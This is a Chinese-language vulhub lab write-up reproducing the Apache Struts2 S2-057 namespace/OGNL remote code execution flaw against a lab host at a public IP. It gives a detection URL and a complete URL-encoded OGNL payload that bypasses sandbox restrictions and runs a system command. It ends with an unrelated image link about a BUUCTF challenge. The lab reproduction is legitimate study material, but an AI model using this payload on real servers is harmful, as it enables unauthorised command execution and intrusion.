环境
vulhub靶场 /struts2/s2-057
漏洞简介
漏洞产⽣于⽹站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置
或使⽤通配符namespace时,可能会导致远程代码执⾏漏洞的发⽣。同样也可能因为url标签没
有设置value和action的值,并且上层动作并没有设置或使⽤通配符namespace,从⽽导致远程
代码执⾏漏洞的发⽣。
S2-057 先决条件:
alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性,或使⽤了通配符
⽤户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执⾏漏洞。
漏洞复现
1.访问靶机地址:
http://47.113.231.0:8080/struts2-showcase/
2.漏洞检测
在url处输⼊http://47.113.231.0:8080/struts2-showcase/ ${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。
3.抓包发送到重放器,将上⾯验证payload的值修改为我们的利⽤exp
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D
![re题(38)BUUCTF-[FlareOn6]Overlong](https://i-blog.csdnimg.cn/direct/9b47ac03866f4faab77c654e413bf047.png)
